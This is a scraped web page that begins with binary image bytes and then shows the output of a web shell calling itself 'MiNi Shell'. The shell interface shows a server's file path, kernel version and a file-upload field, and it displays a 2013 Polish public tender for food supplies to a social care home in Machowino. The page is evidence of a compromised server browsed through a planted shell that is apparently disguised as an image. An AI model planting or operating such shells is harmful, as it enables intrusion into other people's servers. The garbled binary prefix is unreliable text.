JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131115/241367-N-2013.html

<p class="kh_header"><b>Ustka: dostawa artykułów spożywczych do DPS Machowino, z możliwością składania ofert częściowych zgodnie z grupami</b><br>
<b>Numer ogłoszenia: 241367 - 2013; data zamieszczenia: 15.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Machowinie , Machowino 53, 76-270 Ustka, woj. pomorskie, tel. 059 8641292, faks 059 8641292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.dpsmachowino.mojbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa artykułów spożywczych do DPS Machowino, z możliwością składania ofert częściowych zgodnie z grupami.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kod CPV : 03142500-3 jaja konsumpcyjne; 
Kod CPV : 15100000-9 produkty zwierzęce, mięso i produkty 
Kod CPV : 15200000-0 ryby przetworzone i konserwowane
Kod CPV : 15300000-1 owoce, warzywa i podobne produkty
Kod CPV : 15810000-9 pieczywo
Kod CPV : 15500000-3 produkty mleczarskie
Kod CPV : 15800000-6 art. ogólnospożywcze.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.81.00.00-9, 15.50.00.00-3, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu wniesienie wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.dpsmachowino.mojbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Machowinie, 76-270 Ustka, Machowino 53.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2013 godzina 09:00, miejsce: Dom Pomocy Społecznej w Machowinie, 76-270 Ustka, Machowino 53, na I piętrze w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.	Grupa - (CPV 03142500-3) jaja konsumpcyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	jaja konsumpcyjne	szt.	19 440,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2.	Grupa - (CPV 1510000-9) Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	boczek wieprzowy surowy bez żeberek	kg.	370,81
2	kości wieprzowe	kg.	1 120,82
3	łopatka wieprzowa bez kości	kg.	1 820,01
4	schab surowy bez kości	kg.	2,88
5	serca wieprzowe	kg.	14,00
6	słonina wieprzowa bez skóry	kg.	138,84
7	golonka tylnia	kg.	40,87
8	wątroba wieprzowa	kg.	44,19
9	nogi wieprzowe	kg.	50,20
10	żeberka wieprzowe	kg.	55,49
11	karkówka bez kości	kg.	50,52
12	korpusy z kurcząt	kg.	244,39
13	kurczak świeży	kg.	204,89
14	piersi drobiowe	kg.	380,73
15	uda drobiowe	kg.	597,42
16	udziec indyczy	kg.	86,83
17	wątroba drobiowa	kg.	58,53
18	baleron wieprzowy wędzony	kg.	11,86
19	boczek wędzony	kg.	15,61
20	kaszanka gryczana	kg.	224,22
21	kiełbasa biała	kg.	141,62
22	kiełbasa śląska 	kg.	57,54
23	kiełbasa myśliwska	kg.	4,11
24	kiełbasa zwyczajna	kg.	312,01
25	konserwa mielonka wieprzowa 300g	szt.	680,00
26	metka łososiowa	kg.	53,21
27	mielonka kanapkowa	kg.	227,95
28	parówka cienka 	kg.	415,69
29	ogonówka	kg.	92,97
30	pasztet drobiowy 160g w puszce	szt.	1 570,00
31	pasztetowa (wątrobianka)	kg.	181,75
32	salceson czarny	kg.	74,40
33	salceson biały	kg.	20,98
34	szynka drobiowa mielona	kg.	20,90
35	szynka wieprzowa wędzona	kg.	225,54
36	flaki wołowe krojone gotowane	kg.	116,60
37	polędwica 	kg.	290,35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 3.	Grupa - (CPV 15200000-0, 15300000-1) Ryby przetworzone i konserwowane,  Owoce, warzywa i podobne produkty (mrożonki).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	filet z dorsza bałtyckiego	kg.	525,86
2	filet sola	kg.	5,00
3	makrela wędzona	kg.	72,00
4	płaty śledziowe - maties	kg.	260,00
5	paprykarz szczeciński 300g	szt.	420,00
6	szprot w sosie pomidorowym 170g	szt.	1 006,00
7	tuńczyk w oleju 185g	szt.	250,00
8	śledź w sosie pomidorowym 170g	szt.	224,00
9	mrożonka - brokuły	kg.	150,00
10	mrożonka - fasolka szparagowa	kg.	250,00
11	mrożonka - groszek zielony	kg.	100,00
12	mrożonka - kalafior	kg.	170,00
13	mrożonka - marchew kostka	kg.	315,00
14	mrożonka - mieszanka kompotowa	kg.	420,00
15	mrożonka - truskawka	kg.	185,00
16	mrożonka - włoszczyzna	kg.	1 007,50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa - (CPV 15810000-9) pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	baton pszenny 360g	szt.	96,00
2	bułka pszenna 90g	szt.	4 568,00
3	bułka tarta	kg.	140,00
4	chleb mieszany 500g cały	szt.	20 736,00
5	chleb razowy 500	szt.	10,00
6	chleb wiejski 500g krojony	szt.	5,00
7	drożdżówka 100gr.	szt.	3 336,00
8	pączki 50g	szt.	2 121,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 5.	Grupa - (CPV 15500000-3, 15800000-6, 15400000-2, 15600000-4) Produkty mleczarskie, art. ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	mleko 3,2% UHT	L	2 214,00
2	masło ekstra 	kg.	371,80
3	śmietana 18%	L	82,54
4	śmietana 12%	L	1 222,80
5	mleko w proszku tłuste	kg.	1 169,01
6	jogurt (nie mniej niż 125g.)	szt.	4 848,00
7	kefir 200g	L	604,26
8	ser topiony  100g	kg.	430,00
9	ser żółty	kg.	354,60
10	serek homogenizowany 140g.	szt.	6 205,00
11	serek homogenizowany 150g.	szt.	860,00
12	twaróg półtłusty	kg.	1 083,49
13	budyń 60g	kg.	25,40
14	chrzan 290g	kg.	26,00
15	cukier biały 	kg.	650,00
16	curry 20g	szt.	50,00
17	cynamon 20g	szt.	195,00
18	ćwikła z chrzan 	kg.	11,00
19	dżem	kg.	629,68
20	fasola konserwowa 400g	kg.	2,40
21	galaretka owocowa 	kg.	56,38
22	groszek konserwowy 400g	kg.	9,60
23	herbata granulowana 	kg.	36,00
24	kakao	kg.	9,40
25	drożdże 100g	szt.	30,00
26	kasza jęczmienna (pęczak)	kg.	100,00
27	kasza jęczmienna wiejska	kg.	60,00
28	kasza manna	kg.	110,00
29	kawa zbożowa 	kg.	25,00
30	ketchup  	kg.	132,00
31	kisiel  	kg.	47,75
32	koncentrat pomidorowy	kg.	36,00
33	koper suszony, natka pietruszki	kg.	2,62
34	kukurydza konserwowa 	kg.	97,60
35	kwasek cytrynowy 	kg.	3,70
36	majeranek 	kg.	2,00
37	majonez 	kg.	186,72
38	makaron	kg.	235,00
39	margaryna 500g kubek	kg.	676,50
40	masa makowa	kg.	24,80
41	mąka pszenna	kg.	150,00
42	mąka ziemniaczana	kg.	70,00
43	musztarda 	L	36,00
44	ocet spirytusowy 10% (opakowanie maksymalne - 0,5L)	szt.	74,00
45	ogórki konserwowe	kg.	506,80
46	papryka konserwowa 	kg.	93,96
47	papryka mielona słodka/ostra 20g	kg.	2,90
48	pieprz czarny mielony	kg.	8,75
49	pieprz ziołowy 	kg.	4,50
50	płatki kukurydziane 	kg.	28,50
51	płatki owsiane	kg.	106,00
52	przyprawa do zup w płynie (typu maggi) 	L	36,00
53	przyprawa uniwersalna (kucharek)	kg.	40,00
54	rodzynki 	kg.	15,80
55	ryż	kg.	130,00
56	syrop owocowy	L	21,00
57	ziele angielskie	kg.	0,75
58	żelatyna wieprzowa	kg.	1,00
59	płatki ziemniaczane	kg.	50,00
60	sól kamienna	kg.	630,00
61	woda gazowana 1,5L	szt.	450,00
62	woda n/gazowana 1,5L	szt.	450,00
63	woda 0,5L gazowana	szt.	108,00
64	woda 0,5L n/gazowana	szt.	120,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.80.00.00-6, 15.40.00.00-2, 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com